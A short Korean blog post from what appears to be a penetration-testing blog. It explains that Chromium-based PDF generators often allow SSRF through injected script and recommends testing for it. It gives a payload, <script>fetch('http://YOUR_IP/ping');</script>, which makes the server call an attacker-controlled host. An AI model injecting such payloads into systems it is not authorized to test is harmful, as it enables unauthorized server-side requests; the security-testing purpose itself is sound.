annyoung

pdf generator SSRF 본문

모의해킹

pdf generator SSRF

nopsled 2023. 11. 28. 16:24

개인적으로 느끼는게 SSRF가 pdf generator에서 많이 발생하곤 한다.

 

chromedrvier에 의해 생성된 pdf 파일

 

pdf 파일을 vi나 xxd로 확인해보면 Chromium이거나, Skia/PDF인 경우 chromedriver에서 렌더링하기 때문에 XSS로 인해 SSRF가 많이 발생한다.

 

사이트 기능중에 pdf generator가 있다면 한번쯤 테스트 해보는걸 추천한다.

 

테스트 하는 방법은 다음과 같다.

<script>fetch('http://YOUR_IP/ping');</script>
[atom-one-light]

 

pdf generator에서 필요한 값에 위처럼 입력하면 fetch로 공격자 서버에 요청보내게 되어 SSRF가 발생하는걸 볼 수 있다.